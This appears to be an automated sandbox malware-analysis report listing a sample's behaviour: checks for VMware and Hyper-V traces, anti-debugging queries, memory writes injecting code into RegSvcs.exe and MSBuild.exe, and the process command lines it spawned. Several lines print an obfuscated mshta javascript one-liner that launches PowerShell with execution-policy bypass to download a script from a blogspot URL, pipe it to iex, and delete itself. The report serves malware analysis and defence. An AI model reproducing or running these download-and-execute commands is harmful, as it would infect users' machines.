              Source: svchost.exe, 00000012.00000002.3248187549.00000235C6855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3243881494.00000235C122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: mshta.exe, 00000016.00000003.2651741000.000001EC28477000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: ModuleAnalysisCache.0.drBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: RegSvcs.exe, 00000005.00000002.3300848036.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
              Source: mshta.exe, 0000000E.00000003.2340030820.00000219E6161000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.2338954878.00000219E6161000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2626200818.0000028E452B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Amcache.hve.10.drBinary or memory string: vmci.sys
              Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
              Source: ModuleAnalysisCache.0.drBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.10.drBinary or memory string: VMware20,1
              Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: powershell.exe, 0000000F.00000002.2330397504.000002D2C29E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
              Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_04D3A6B0 CheckRemoteDebuggerPresent,5_2_04D3A6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 13B0000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 740000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: B00000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: B50000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 1100000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 13B0000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 13B2000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1482000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1484000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11CB008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 740000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 742000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 812000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 814000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5FE008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: B00000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: B02000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: BD2000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: BD4000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 981008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: B50000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: B52000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: C22000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: C24000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 837008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 1100000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 1102000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 11D2000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 11D4000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: EC8008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 788Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;
              Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:nd=['scripting.filesystemobject','wscript.shell','powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm minecap4-22-24.blogspot.com/haha | iex);start-sleep -seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new activexobject(la[2])[la[0]](la[3], 0, true);close();new activexobject(la[1]).deletefile(wscript.scriptfullname);"
              Source: unknownProcess created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" "javascript:ql=['scripting.filesystemobject','wscript.shell','powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm minecap4-22-24.blogspot.com/haha | iex);start-sleep -seconds 5;','run']; la=[ql[3
              Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:nd=['scripting.filesystemobject','wscript.shell','powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm minecap4-22-24.blogspot.com/haha | iex);start-sleep -seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new activexobject(la[2])[la[0]](la[3], 0, true);close();new activexobject(la[1]).deletefile(wscript.scriptfullname);"
              Source: unknownProcess created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" "javascript:ql=['scripting.filesystemobject','wscript.shell','powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm minecap4-22-24.blogspot.com/haha | iex);start-sleep -seconds 5;','run']; la=[ql[3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
